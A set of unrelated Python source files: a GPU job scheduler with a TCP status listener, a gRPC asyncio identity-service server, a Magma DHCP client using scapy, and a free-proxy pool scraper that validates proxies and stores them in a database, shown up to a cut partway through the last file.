checkpoint_dict[key] = 0
json_file = json.dumps(checkpoint_dict)
with open('checkpoint.json', 'w') as fp:
fp.write(json_file)
ckpt_qual_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
ckpt_qual_dict[job_name] = 0
finish_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
finish_dict[job_name] = 0
epoch_waste_dict = {}
with open('epoch_waste.json', 'r') as fp:
epoch_waste_dict = json.load(fp)
for key in epoch_waste_dict:
epoch_waste_dict[key] = 0
json_file = json.dumps(epoch_waste_dict)
with open('epoch_waste.json', 'w') as fp:
fp.write(json_file)
#################### background thread running TCP socket ########################
def thread_function():
# here listen on the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (host_node, 10002)
print('starting up on {} port {}'.format(*server_address))
sock.bind(server_address)
sock.listen(5)
while True:
# Wait for a connection
connection, client_address = sock.accept()
try:
while True:
data = connection.recv(32)
if data:
data_str = data.decode('utf-8')
if 'param' in data_str:
pass
elif 'ckpt_qual' in data_str:
global ckpt_qual_dict
job_name = data_str.split(' ')[0]
ckpt_qual_dict[job_name] = 1
elif 'finish' in data_str:
global finish_dict
job_name = data_str.split(' ')[0]
finish_dict[job_name] = 1
print('received ' + data_str)
connection.sendall(b'success')
#time.sleep(5)
else:
break
finally:
connection.close()
x = threading.Thread(target=thread_function, daemon=True)
x.start()
###############################################################################
######################################################################
while True:
# termination condition:
# all the jobs have finished
################### check for finished jobs on K80 ##############################
for gpu, job in K80_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
K80_used -= 1
K80_job[gpu] = 'idle'
print('K80 finished job: ' + job)
JCT[job] = int(time.time() - job_start[job])
elif ovhd_start[job] != 0:
# check if ckpt overhead has finished
if ckpt_qual_dict['job'+job] == 1:
overhead[job] += int(time.time() - ovhd_start[job])
ovhd_start[job] = 0
################ check run time of current K80 job, update qualified_job #################
for job in list(K80_job.values()):
if job not in qualified_job and job != 'idle':
runtime = int(time.time() - job_start[job])
if runtime >= QUALIFY_TIME:
qualified_job.append(job)
print('job' + job + ' has been qualified for promotion')
################ make promotion decisions ########################
K80_free = K80_cap - K80_used
################ submit new jobs to vacant K80 GPUs ############################
# check if there are vacant K80s
## yes: submit jobs from queue
## no: do nothing
if K80_used < K80_cap:
K80_free = K80_cap - K80_used
for i in range(K80_free):
time_passed = int(time.time() - queue_timer)
if index < len(queue) and queue_dict[queue[index]] < time_passed: # make sure job has arrived in the queue
job_new = str(queue[index])
for gpu, job in K80_job.items():
if job == 'idle': # schedule new job here if idle
start_job(K80_node, gpu, job_new)
K80_job[gpu] = job_new
job_start[job_new] = time.time()
index += 1
K80_used += 1
time.sleep(5) # don't communicate too often
break
############### wait for next iteration
time.sleep(INTERVAL)
################ check if termination condition is met ################
K80_idle_num = sum(value == 'idle' for value in K80_job.values())
if K80_idle_num == K80_cap and index == len(queue):
print('all jobs are finished!')
break
# get average JCT
average_JCT = np.average(list(JCT.values()))
JCT['average'] = average_JCT
average_overhead = np.average(list(overhead.values()))
overhead['average'] = average_overhead
# after everything is finished
with open('epoch_waste.json', 'r') as fp:
epoch_waste_dict = json.load(fp)
print('finished all runs')
JCT_name = testcase + '_JCT.json'
overhead_name = testcase + '_overhead.json'
num_mig_name = testcase + '_num_mig.json'
epoch_waste_name = testcase + '_epoch_waste.json'
ckpt_qual_name = 'ckpt_qual.json'
finish_name = 'finish.json'
with open(JCT_name, 'w') as fp1:
json.dump(JCT, fp1, sort_keys=True, indent=4)
with open(overhead_name, 'w') as fp3:
json.dump(overhead, fp3, sort_keys=True, indent=4)
with open(num_mig_name, 'w') as fp3:
json.dump(num_mig, fp3, sort_keys=True, indent=4)
with open(epoch_waste_name, 'w') as fp3:
json.dump(epoch_waste_dict, fp3, sort_keys=True, indent=4)
with open(ckpt_qual_name, 'w') as fp1:
json.dump(ckpt_qual_dict, fp1, sort_keys=True, indent=4)
with open(finish_name, 'w') as fp1:
json.dump(finish_dict, fp1, sort_keys=True, indent=4)
|
server.py
|
#######
# https://gist.github.com/seglberg/0b4487b57b4fd425c56ad72aba9971be
#######
import asyncio
from concurrent import futures
import functools
import threading
import os
import sys
import inspect
import grpc
import time
from grpc import _server
import logging
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.DEBUG)
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(os.path.abspath(ROOT_DIR+'/identityLayer'))
sys.path.append(os.path.abspath(ROOT_DIR))
from identityLayer import identitylayer_pb2
from identityLayer import identitylayer_pb2_grpc
from anoncreds_service import AnoncredsServiceServicer
from blob_storage_service import BlobStorageServiceServicer
from crypto_service import CryptoServiceServicer
from did_service import DidServiceServicer
from ledger_service import LedgerServiceServicer
from non_secret_service import NonSecretServiceServicer
from pairwise_service import PairwiseServiceServicer
from pool_service import PoolServiceServicer
from wallet_service import WalletServiceServicer
_ONE_DAY_IN_SECONDS = 60 * 60 * 24
def _loop_mgr(loop: asyncio.AbstractEventLoop):
asyncio.set_event_loop(loop)
loop.run_forever()
# If we reach here, the loop was stopped.
# We should gather any remaining tasks and finish them.
pending = asyncio.Task.all_tasks(loop=loop)
if pending:
loop.run_until_complete(asyncio.gather(*pending))
class AsyncioExecutor(futures.Executor):
def __init__(self, *, loop=None):
super().__init__()
self._shutdown = False
self._loop = loop or asyncio.get_event_loop()
self._thread = threading.Thread(target=_loop_mgr, args=(self._loop,),
daemon=True)
self._thread.start()
def submit(self, fn, *args, **kwargs):
if self._shutdown:
raise RuntimeError('Cannot schedule new futures after shutdown')
if not self._loop.is_running():
raise RuntimeError("Loop must be started before any function can "
"be submitted")
if inspect.iscoroutinefunction(fn):
coro = fn(*args, **kwargs)
return asyncio.run_coroutine_threadsafe(coro, self._loop)
else:
func = functools.partial(fn, *args, **kwargs)
return self._loop.run_in_executor(None, func)
def shutdown(self, wait=True):
self._loop.stop()
self._shutdown = True
if wait:
self._thread.join()
# --------------------------------------------------------------------------- #
async def _call_behavior(rpc_event, state, behavior, argument, request_deserializer):
context = _server._Context(rpc_event, state, request_deserializer)
try:
return await behavior(argument, context), True
except Exception as e: # pylint: disable=broad-except
with state.condition:
if e not in state.rpc_errors:
details = 'Exception calling application: {}'.format(e)
_server.logging.exception(details)
_server._abort(state, rpc_event.operation_call,
_server.cygrpc.StatusCode.unknown, _server._common.encode(details))
return None, False
async def _take_response_from_response_iterator(rpc_event, state, response_iterator):
try:
return await response_iterator.__anext__(), True
except StopAsyncIteration:
return None, True
except Exception as e: # pylint: disable=broad-except
with state.condition:
if e not in state.rpc_errors:
details = 'Exception iterating responses: {}'.format(e)
_server.logging.exception(details)
_server._abort(state, rpc_event.operation_call,
_server.cygrpc.StatusCode.unknown, _server._common.encode(details))
return None, False
async def _unary_response_in_pool(rpc_event, state, behavior, argument_thunk, request_deserializer, response_serializer):
argument = argument_thunk()
if argument is not None:
response, proceed = await _call_behavior(rpc_event, state, behavior,
argument, request_deserializer)
if proceed:
serialized_response = _server._serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
_server._status(rpc_event, state, serialized_response)
async def _stream_response_in_pool(rpc_event, state, behavior, argument_thunk, request_deserializer, response_serializer):
argument = argument_thunk()
if argument is not None:
# Notice this calls the normal `_call_behavior` not the awaitable version.
response_iterator, proceed = _server._call_behavior(
rpc_event, state, behavior, argument, request_deserializer)
if proceed:
while True:
response, proceed = await _take_response_from_response_iterator(
rpc_event, state, response_iterator)
if proceed:
if response is None:
_server._status(rpc_event, state, None)
break
else:
serialized_response = _server._serialize_response(
rpc_event, state, response, response_serializer)
print(response)
if serialized_response is not None:
print("Serialized Correctly")
proceed = _server._send_response(rpc_event, state,
serialized_response)
if not proceed:
break
else:
break
else:
break
_server._unary_response_in_pool = _unary_response_in_pool
_server._stream_response_in_pool = _stream_response_in_pool
if __name__ == '__main__':
server = grpc.server(AsyncioExecutor())
identitylayer_pb2_grpc.add_NonSecretServiceServicer_to_server(NonSecretServiceServicer(), server)
identitylayer_pb2_grpc.add_LedgerServiceServicer_to_server(LedgerServiceServicer(), server)
identitylayer_pb2_grpc.add_DidServiceServicer_to_server(DidServiceServicer(), server)
identitylayer_pb2_grpc.add_PairwiseServiceServicer_to_server(PairwiseServiceServicer(), server)
identitylayer_pb2_grpc.add_CryptoServiceServicer_to_server(CryptoServiceServicer(), server)
identitylayer_pb2_grpc.add_PoolServiceServicer_to_server(PoolServiceServicer(), server)
identitylayer_pb2_grpc.add_AnoncredsServiceServicer_to_server(AnoncredsServiceServicer(), server)
identitylayer_pb2_grpc.add_WalletServiceServicer_to_server(WalletServiceServicer(), server)
identitylayer_pb2_grpc.add_BlobStorageServiceServicer_to_server(BlobStorageServiceServicer(), server)
server.add_insecure_port('[::]:50051')
server.start()
try:
logger.debug("Started `miu` Server on port :50051")
while True:
time.sleep(_ONE_DAY_IN_SECONDS)
except KeyboardInterrupt:
logger.debug("Stopped `miu` server.")
server.stop(0)
|
dhcp_client.py
|
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Allocates IP address as per DHCP server in the uplink network.
"""
import datetime
import logging
import threading
import time
from ipaddress import IPv4Network, ip_address
from threading import Condition
from typing import MutableMapping, Optional
from magma.mobilityd.dhcp_desc import DHCPDescriptor, DHCPState
from magma.mobilityd.mac import MacAddress, hex_to_mac
from magma.mobilityd.uplink_gw import UplinkGatewayInfo
from scapy.all import AsyncSniffer
from scapy.layers.dhcp import BOOTP, DHCP
from scapy.layers.inet import IP, UDP
from scapy.layers.l2 import Dot1Q, Ether
from scapy.sendrecv import sendp
LOG = logging.getLogger('mobilityd.dhcp.sniff')
DHCP_ACTIVE_STATES = [DHCPState.ACK, DHCPState.OFFER]
class DHCPClient:
THREAD_YIELD_TIME = .1
def __init__(self,
dhcp_store: MutableMapping[str, DHCPDescriptor],
gw_info: UplinkGatewayInfo,
dhcp_wait: Condition,
iface: str = "dhcp0",
lease_renew_wait_min: int = 200):
"""
Implement DHCP client to allocate IP for given Mac address.
DHCP client state is maintained in user provided hash table.
Args:
dhcp_store: maintain DHCP transactions, key is mac address.
gw_info_map: stores GW IP info from DHCP server
dhcp_wait: notify users on new DHCP packet
iface: DHCP egress and ingress interface.
"""
self._sniffer = AsyncSniffer(iface=iface,
filter="udp and (port 67 or 68)",
store=False,
prn=self._rx_dhcp_pkt)
self.dhcp_client_state = dhcp_store # mac => DHCP_State
self.dhcp_gw_info = gw_info
self._dhcp_notify = dhcp_wait
self._dhcp_interface = iface
self._msg_xid = 0
self._lease_renew_wait_min = lease_renew_wait_min
self._monitor_thread = threading.Thread(target=self._monitor_dhcp_state)
self._monitor_thread.daemon = True
self._monitor_thread_event = threading.Event()
def run(self):
"""
Start DHCP sniffer thread.
This initializes state required for DHCP sniffer thread anf starts it.
Returns: None
"""
self._sniffer.start()
LOG.info("DHCP sniffer started")
# give it time to schedule the thread and start sniffing.
time.sleep(self.THREAD_YIELD_TIME)
self._monitor_thread.start()
def stop(self):
self._sniffer.stop()
self._monitor_thread_event.set()
def send_dhcp_packet(self, mac: MacAddress, vlan: str,
state: DHCPState,
dhcp_desc: DHCPDescriptor = None):
"""
Send DHCP packet and record state in dhcp_client_state.
Args:
mac: MAC address of interface
state: state of DHCP packet
dhcp_desc: DHCP protocol state.
Returns:
"""
ciaddr = None
# generate DHCP request packet
if state == DHCPState.DISCOVER:
dhcp_opts = [("message-type", "discover")]
dhcp_desc = DHCPDescriptor(mac=mac, ip="", vlan=vlan,
state_requested=DHCPState.DISCOVER)
self._msg_xid = self._msg_xid + 1
pkt_xid = self._msg_xid
elif state == DHCPState.REQUEST:
dhcp_opts = [("message-type", "request"),
("requested_addr", dhcp_desc.ip),
("server_id", dhcp_desc.server_ip)]
dhcp_desc.state_requested = DHCPState.REQUEST
pkt_xid = dhcp_desc.xid
ciaddr = dhcp_desc.ip
elif state == DHCPState.RELEASE:
dhcp_opts = [("message-type", "release"),
("server_id", dhcp_desc.server_ip)]
dhcp_desc.state_requested = DHCPState.RELEASE
self._msg_xid = self._msg_xid + 1
pkt_xid = self._msg_xid
ciaddr = dhcp_desc.ip
else:
LOG.warning("Unknown egress request mac %s state %s", str(mac), state)
return
dhcp_opts.append("end")
dhcp_desc.xid = pkt_xid
with self._dhcp_notify:
self.dhcp_client_state[mac.as_redis_key(vlan)] = dhcp_desc
pkt = Ether(src=str(mac), dst="ff:ff:ff:ff:ff:ff")
if vlan and vlan != "0":
pkt /= Dot1Q(vlan=int(vlan))
pkt /= IP(src="0.0.0.0", dst="255.255.255.255")
pkt /= UDP(sport=68, dport=67)
pkt /= BOOTP(op=1, chaddr=mac.as_hex(), xid=pkt_xid, ciaddr=ciaddr)
pkt /= DHCP(options=dhcp_opts)
LOG.debug("DHCP pkt xmit %s", pkt.show(dump=True))
sendp(pkt, iface=self._dhcp_interface, verbose=0)
def get_dhcp_desc(self, mac: MacAddress, vlan: str) -> Optional[DHCPDescriptor]:
"""
Get DHCP description for given MAC.
Args:
mac: Mac address of the client
vlan: vlan id if the IP allocated in a VLAN
Returns: Current DHCP info.
"""
key = mac.as_redis_key(vlan)
if key in self.dhcp_client_state:
return self.dhcp_client_state[key]
LOG.debug("lookup error for %s", str(key))
return None
def release_ip_address(self, mac: MacAddress, vlan: str):
"""
Release DHCP allocated IP.
Args:
mac: MAC address of the IP allocated.
vlan: vlan id if the IP allocated in a VLAN
Returns: None
"""
key = mac.as_redis_key(vlan)
if key not in self.dhcp_client_state:
LOG.error("Unallocated DHCP release for MAC: %s", key)
return
dhcp_desc = self.dhcp_client_state[key]
self.send_dhcp_packet(mac, dhcp_desc.vlan, DHCPState.RELEASE, dhcp_desc)
del self.dhcp_client_state[key]
def _monitor_dhcp_state(self):
"""
monitor DHCP client state.
"""
while True:
wait_time = self._lease_renew_wait_min
with self._dhcp_notify:
for dhcp_record in self.dhcp_client_state.values():
logging.debug("monitor: %s", dhcp_record)
# Only process active records.
if dhcp_record.state not in DHCP_ACTIVE_STATES:
continue
now = datetime.datetime.now()
logging.debug("monitor time: %s", now)
request_state = DHCPState.REQUEST
# in case of lost DHCP lease rediscover it.
if now >= dhcp_record.lease_expiration_time:
request_state = DHCPState.DISCOVER
if now >= dhcp_record.lease_renew_deadline:
logging.debug("sending lease renewal")
self.send_dhcp_packet(dhcp_record.mac, dhcp_record.vlan,
request_state, dhcp_record)
else:
# Find next renewal wait time.
time_to_renew = dhcp_record.lease_renew_deadline - now
wait_time = min(wait_time, time_to_renew.total_seconds())
# default in wait is 30 sec
wait_time = max(wait_time, self._lease_renew_wait_min)
logging.debug("lease renewal check after: %s sec" % wait_time)
self._monitor_thread_event.wait(wait_time)
if self._monitor_thread_event.is_set():
break
@staticmethod
def _get_option(packet, name):
for opt in packet[DHCP].options:
if opt[0] == name:
return opt[1]
return None
def _process_dhcp_pkt(self, packet, state: DHCPState):
LOG.debug("DHCP pkt recv %s", packet.show(dump=True))
mac_addr = MacAddress(hex_to_mac(packet[BOOTP].chaddr.hex()[0:12]))
vlan = ""
if Dot1Q in packet:
vlan = str(packet[Dot1Q].vlan)
mac_addr_key = mac_addr.as_redis_key(vlan)
with self._dhcp_notify:
if mac_addr_key in self.dhcp_client_state:
state_requested = self.dhcp_client_state[mac_addr_key].state_requested
if BOOTP not in packet or packet[BOOTP].yiaddr is None:
LOG.error("no ip offered")
return
ip_offered = packet[BOOTP].yiaddr
subnet_mask = self._get_option(packet, "subnet_mask")
if subnet_mask is not None:
ip_subnet = IPv4Network(ip_offered + "/" + subnet_mask, strict=False)
else:
ip_subnet = IPv4Network(ip_offered + "/" + "32", strict=False)
dhcp_server_ip = None
if IP in packet:
dhcp_server_ip = packet[IP].src
dhcp_router_opt = self._get_option(packet, "router")
if dhcp_router_opt is not None:
router_ip_addr = ip_address(dhcp_router_opt)
else:
# use DHCP as upstream router in case of missing Open 3.
router_ip_addr = dhcp_server_ip
self.dhcp_gw_info.update_ip(router_ip_addr, vlan)
lease_expiration_time = self._get_option(packet, "lease_time")
dhcp_state = DHCPDescriptor(mac=mac_addr,
ip=ip_offered,
state=state,
vlan=vlan,
state_requested=state_requested,
subnet=str(ip_subnet),
server_ip=dhcp_server_ip,
router_ip=router_ip_addr,
lease_expiration_time=lease_expiration_time,
xid=packet[BOOTP].xid)
LOG.info("Record DHCP for: %s state: %s", mac_addr_key, dhcp_state)
self.dhcp_client_state[mac_addr_key] = dhcp_state
self._dhcp_notify.notifyAll()
if state == DHCPState.OFFER:
# let other thread work on fulfilling IP allocation request.
threading.Event().wait(self.THREAD_YIELD_TIME)
self.send_dhcp_packet(mac_addr, vlan, DHCPState.REQUEST, dhcp_state)
else:
LOG.debug("Unknown MAC: %s " % packet.summary())
return
# ref: https://fossies.org/linux/scapy/scapy/layers/dhcp.py
def _rx_dhcp_pkt(self, packet):
if DHCP not in packet:
return
# Match DHCP offer
if packet[DHCP].options[0][1] == int(DHCPState.OFFER):
self._process_dhcp_pkt(packet, DHCPState.OFFER)
# Match DHCP ack
elif packet[DHCP].options[0][1] == int(DHCPState.ACK):
self._process_dhcp_pkt(packet, DHCPState.ACK)
# TODO handle other DHCP protocol events.
|
getproxy.py
|
# -*- coding: utf-8 -*-
# @Author: gunjianpan
# @Date: 2019-06-06 17:15:37
# @Last Modified by: gunjianpan
# @Last Modified time: 2019-07-26 21:56:43
import argparse
import codecs
import functools
import http.cookiejar as cj
import os
import random
import re
import threading
import time
import requests
import sys
sys.path.append(os.getcwd())
from apscheduler.schedulers.blocking import BlockingScheduler
from bs4 import BeautifulSoup
from util.db import Db
from util.util import begin_time, end_time, changeJsonTimeout, changeHtmlTimeout, basic_req, time_str, can_retry, echo
"""
* www.proxyserverlist24.top
* www.live-socks.net
* gatherproxy.com
* goubanjia.com
xicidaili.com
data5u.com
66ip.com
kuaidaili.com
.data/
├── gatherproxy // gather proxy list
└── passage // gather passage
"""
data_dir = 'proxy/data/'
MAXN = 0x3fffffff
type_map = {1: 'https', 0: 'http'}
class GetFreeProxy:
''' proxy pool '''
def __init__(self):
self.Db = Db("proxy")
self.insert_sql = '''INSERT INTO ip_proxy( `address`, `http_type`) VALUES %s '''
self.select_list = '''SELECT address, http_type from ip_proxy WHERE `is_failured` = 0'''
self.select_sql = '''SELECT `id`, address, `is_failured` from ip_proxy WHERE `address` in %s '''
self.select_all = '''SELECT `address`, `http_type` from ip_proxy WHERE `is_failured` != 5 and http_type in %s'''
self.replace_ip = '''REPLACE INTO ip_proxy(`id`, `address`, `http_type`, `is_failured`) VALUES %s'''
self.canuseip = {}
self.waitjudge = []
self.cannotuseip = {}
self.failuredtime = {}
self.canuse_proxies = []
self.initproxy()
def proxy_req(self, url:str, types:int, data=None, test_func=None, header=None):
"""
use proxy to send requests, and record the proxy cann't use
@types S0XY: X=0.->get; =1.->post;
Y=0.->html; =1.->json; =2.->basic
S=0.->basic ;=1.->ss
support failured retry && failured auto record
"""
httptype = url[4] == 's'
ss_type = types // 1000
types %= 1000
if ss_type:
proxylist = self.proxylists_ss if httptype else self.proxylist_ss
else:
proxylist = self.proxylists if httptype else self.proxylist
if not len(proxylist):
if self.Db.db:
echo(0, 'Proxy pool empty!!! Please check the db conn & db dataset!!!')
proxies = {}
else:
index = random.randint(0, len(proxylist) - 1)
proxies_url = proxylist[index]
proxies = {type_map[httptype]: proxies_url}
try:
result = basic_req(url, types, proxies, data, header)
if not test_func is None:
if not test_func(result):
if self.check_retry(url):
self.proxy_req(url, types + 1000 * ss_type, data, test_func)
else:
self.failuredtime[url] = 0
return
else:
return result
else:
return result
except:
self.cannotuseip[random.randint(0, MAXN)] = proxies_url
if proxies_url in proxylist:
proxylist.remove(proxylist.index(proxies_url))
if not len(self.cannotuseip.keys()) % 10:
self.cleancannotuse()
if self.check_retry(url):
self.proxy_req(url, types + 1000 * ss_type, data, test_func)
else:
return
def check_retry(self, url):
"""
check cannt retry
"""
if url not in self.failuredtime:
self.failuredtime[url] = 0
return True
elif self.failuredtime[url] < 3:
self.failuredtime[url] += 1
return True
else:
self.log_write(url)
self.failuredtime[url] = 0
return False
def log_write(self, url):
"""
failure log
"""
with codecs.open("proxy.log", 'a', encoding='utf-8') as f:
f.write(time_str()+ url + '\n')
def insertproxy(self, insertlist):
"""
insert data to db
"""
results = self.Db.insert_db(self.insert_sql % str(insertlist)[1:-1])
if results:
echo(2, 'Insert ' + str(len(insertlist)) + ' items Success!')
else:
pass
def updateproxy(self, updatelist, types):
"""
update data to db
"""
results = self.Db.update_db(self.replace_ip % str(updatelist)[1:-1])
typemap = {0: 'can use ', 1: 'can not use '}
if results:
echo(2, 'Update', typemap[types],str(len(updatelist)),' items Success!')
else:
pass
def selectproxy(self, targetlist):
"""
select ip proxy by ids
"""
if not len(targetlist):
return []
elif len(targetlist) == 1:
waitlist = '(\'' + targetlist[0] + '\')'
else:
waitlist = tuple(targetlist)
return self.Db.select_db(self.select_sql % str(waitlist))
def dbcanuseproxy(self):
"""
test db have or not this data
"""
results = self.selectproxy([ii[0] for ii in self.canuseip.values()])
ss_len = len([1 for ii in self.canuseip.values() if ii[1] > 1])
echo(2, "SS proxies %d"%ss_len)
insertlist = []
updatelist = []
ipmap = {}
if results != False:
for ip_info in results:
ipmap[ip_info[1]] = [ip_info[0], ip_info[2]]
for ip_now in self.canuseip.values():
http_type = ip_now[1]
ip_now = ip_now[0]
if ip_now in ipmap:
if ipmap[ip_now][1]:
updatelist.append(
(ipmap[ip_now][0], ip_now, http_type, 0))
else:
insertlist.append((ip_now, http_type))
if len(insertlist):
self.insertproxy(insertlist)
if len(updatelist):
self.updateproxy(updatelist, 0)
else:
pass
self.canuseip = {}
def cleancannotuse(self):
"""
update db proxy cann't use
"""
results = self.selectproxy(self.cannotuseip.values())
updatelist = []
ipmap = {}
if results:
for ip_info in results:
ipmap[ip_info[1]] = [ip_info[0], ip_info[2]]
for ip_now in self.cannotuseip.values():
http_type = ip_now[4] == 's'
if ip_now in ipmap:
updatelist.append(
(ipmap[ip_now][0], ip_now, http_type, ipmap[ip_now][1] + 1))
if len(updatelist):
self.updateproxy(updatelist, 1)
else:
pass
self.cannotuseip = {}
def initproxy(self):
"""
init proxy list
"""
results = self.Db.select_db(self.select_list)
self.proxylist = []
self.proxylists = []
self.proxylist_ss = []
self.proxylists_ss = []
if not results:
echo(0, 'Please check db configure!!! The proxy pool cant use!!!>>>')
return
for index in results:
if index[1] == 1:
self.proxylists.append(index[0])
elif index[1] == 2:
self.proxylist.append(index[0])
self.proxylist_ss.append(index[0])
elif index[1] == 3:
self.proxylists.append(index[0])
self.proxylists_ss.append(index[0])
else:
self.proxylist.append(index[0])
echo(2, len(self.proxylist), ' http proxy can use.')
echo(2, len(self.proxylists), ' https proxy can use.')
echo(2, len(self.proxylist_ss), ' ss http proxy can use.')
echo(2, len(self.proxylists_ss), ' ss https proxy can use.')
def judgeurl(self, urls, index, times, ss_test=False):
"""
use /api/playlist to judge http; use /discover/playlist judge https
1. don't timeout = 5
2. response.result.tracks.size() != 1
"""
http_type = urls[4] == 's'
proxies = {type_map[http_type]: urls}
test_url = type_map[http_type] + '://music.163.com/api/playlist/detail?id=432853362'
ss_url = 'https://www.google.com/?gws_rd=ssl'
try:
data = basic_req(test_url, 1, proxies)
result = data['result']
tracks = result['tracks']
if len(tracks) == 56:
if times < 0:
self.judgeurl(urls, index, times + 1)
else:
echo(1, urls, proxies, 'Proxies can use.')
self.canuse_proxies.append(urls)
self.canuseip[index] = [urls, int(http_type)]
if ss_test:
data = basic_req(ss_url, 0)
if len(str(data)) > 5000:
self.canuseip[index] = [urls, int(http_type) + 2]
else:
echo(0, urls, proxies, 'Tracks len error ^--<^>--^ ')
self.cannotuseip[index] = urls
except:
echo(0, urls, proxies, 'return error [][][][][][]')
if not index in self.canuseip:
self.cannotuseip[index] = urls
pass
def threadjude(self, batch_size=500):
"""
threading to judge proxy
"""
changeJsonTimeout(2)
changeHtmlTimeout(3)
text = self.waitjudge
num = len(text)
for block in range(num // batch_size + 1):
blockthreads = []
for index in range(block * batch_size, min(num, batch_size * (block + 1))):
work = threading.Thread(
target=self.judgeurl, args=(text[index],index, 0,))
blockthreads.append(work)
for work in blockthreads:
work.start()
for work in blockthreads:
work.join()
self.dbcanuseproxy()
self.cleancannotuse()
self.waitjudge = []
def testdb(self, types):
'''
test proxy in db can use
'''
version = begin_time()
typestr = ''
if types == 2:
typestr = '(0,1,2,3)'
elif types == 1:
typestr = '(1,3)'
else:
typestr = '(0,2)'
results = self.Db.select_db(self.select_all % typestr)
if results != 0:
for index in results:
self.waitjudge.append(index[0])
self.threadjude()
else:
pass
self.initproxy()
end_time(version)
def xiciproxy(self, page):
"""
xici proxy http://www.xicidaili.com/nn/{page}
The first proxy I use, but now it can not use it mostly.
"""
if not str(page).isdigit():
echo(0, "Please input num!")
return []
version = begin_time()
url = 'http://www.xicidaili.com/nn/%d'
for index in range(1, page + 1):
html = basic_req(url%(index), 0)
tem = html.find_all('tr')
for index in range(1, len(tem)):
tds = tem[index].find_all('td')
ip = tds[5].text.lower()
self.waitjudge.append(
ip + '://' + tds[1].text + ':' + tds[2].text)
self.threadjude()
end_time(version)
def gatherproxy(self, types):
"""
:100: very nice website
first of all you should download proxy ip txt from:
http://www.gatherproxy.com/zh/proxylist/country/?c=China
"""
if not os.path.exists('{}gatherproxy'.format(data_dir)):
echo(0, 'Gather file not exist!!!')
return
with codecs.open('{}gatherproxy'.format(data_dir), 'r', encoding='utf-8') as f:
file_d = [ii.strip() for ii in f.readlines()]
waitjudge_http = ['http://' + ii for ii in file_d]
waitjudge_https = ['https://' + ii for ii in file_d]
if not types:
self.waitjudge += waitjudge_http
elif types ==1:
self.waitjudge += waitjudge_https
elif types == 2:
self.waitjudge += (waitjudge_http + waitjudge_https)
else:
self.waitjudge += file_d
echo(2, 'load gather over!')
def goubanjia(self):
"""
:-1: html tag mixed with invalid data
:100:And the most important thing is the port writed in 'class' rather in text.
The website is difficult to spider, but the proxys are very goog
goubanjia proxy http://www.goubanjia.com
"""
version = begin_time()
host = 'http://www.goubanjia.com'
html = self.proxy_req(host, 0)
if not html:
return []
trs = html.find_all('tr', class_=['warning', 'success'])
for tr in trs:
tds = tr.find_all('td')
ip = tds[2].find_all('a')[0].text + '://'
iplist = tds[0].find_all(
['div', 'span', not 'p'], class_=not 'port')
for index in iplist:
ip += index.text
encode = tds[0].find_all(['div', 'span', 'p'], class_='port')[
0]['class'][1]
uncode = functools.reduce(
lambda x, y: x * 10 + (ord(y) - ord('A')), map(lambda x: x, encode), 0)
self.waitjudge.append(ip + ':' + str(int(uncode / 8)))
self.threadjude()
end_time(version)
def schedulegou(self):
sched = BlockingScheduler()
sched.add_job(self.goubanjia, 'interval', seconds=100)
sched.start()
def data5u(self):
"""
data5u proxy http://www.data5u.com/
no one can use
"""
version = begin_time()
url_list = [
'', 'free/gngn/index.shtml', 'free/gwgn/index.shtml'
]
host = 'http://www.data5u.com/'
for uri in url_list:
html = self.proxy_req(host + uri, 0)
if not html:
continue
table = html.find_all('ul', class_='l2')
for index in table:
tds = index.find_all('li')
ip = tds[3].text
self.waitjudge.append(
ip + '://' + tds[0].text + ':' + tds[1].text)
self.threadjude()
end_time(version)
def sixsixip(self, area, page):
"""
66ip proxy http://www.66ip.cn/areaindex_{area}/{page}.html
"""
version = begin_time()
threadings = []
for index in range(1, area + 1):
for pageindex in range(1, page + 1):
echo(2,str(index) + ' ' + str(pageindex))
work = threading.Thread(
target=self.sixsixthread, args=(index, pageindex))
threadings.append(work)
for work in threadings:
work.start()
for work in threadings:
work.join()
self.threadjude()
end_time(version)
def sixsixthread(self, index, pageindex):
host = '''http://www.66ip.cn/areaindex_%d/%d.html'''
html = self.proxy_req(host % (index, pageindex), 0)
if not html:
return []
trs = html.find_all('table')[2].find_all('tr')
for test in range(1, len(trs) - 1):
tds = trs[test].find_all('td')
self.waitjudge.append('http://' + tds[0].text + ':' + tds[1].text)
self.waitjudge.append('https://' + tds[0].text + ':' + tds[1].text)
def kuaidaili(self, page):
"""
kuaidaili https://www.kuaidaili.com/free/
"""
version = begin_time()
threadings = []
for index in range(1, page + 1):
work = threading.Thread(
target=self.kuaidailithread, args=(index,))
threadings.append(work)
for work in threadings:
work.start()
for work in threadings:
work.join()
self.threadjude()
end_time(version)
def kuaidailithread(self, index):
host = '''https://www.kuaidaili.com/free/inha/%d/'''
html = self.proxy_req(host % index, 0)
if not html:
return []
trs = html.find_all('tr')
for index in range(1, len(trs)):
tds = trs[index].find_all('td')
ip = tds[3].text.lower() + "://" + tds[0].text + ':' + tds[1].text
self.waitjudge.append(ip)
def get_cookie(self):
"""
make cookie login
PS: Though cookie expired time is more than 1 year,
but It will be break when the connect close.
So you need reactive the cookie by this function.
"""
headers = {
'pragma': 'no-cache',
'cache-control': 'no-cache',
'Host': 'www.gatherproxy.com',
'Origin': 'http://www.gatherproxy.com',
'Referer': 'http://www.gatherproxy.com/proxylist/anonymity/?t=Transparent',
'Cookie': '_lang=en-US; _ga=GA1.2.1084455496.1548351129; _gid=GA1.2.1515017701.1552361687; ASP.NET_SessionId=ckin3pzyqyoyt3zg54zrtrct; _gat=1; arp_scroll_position=57',
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
"Accept-Encoding": "",
"Accept-Language": "zh-CN,zh;q=0.9",
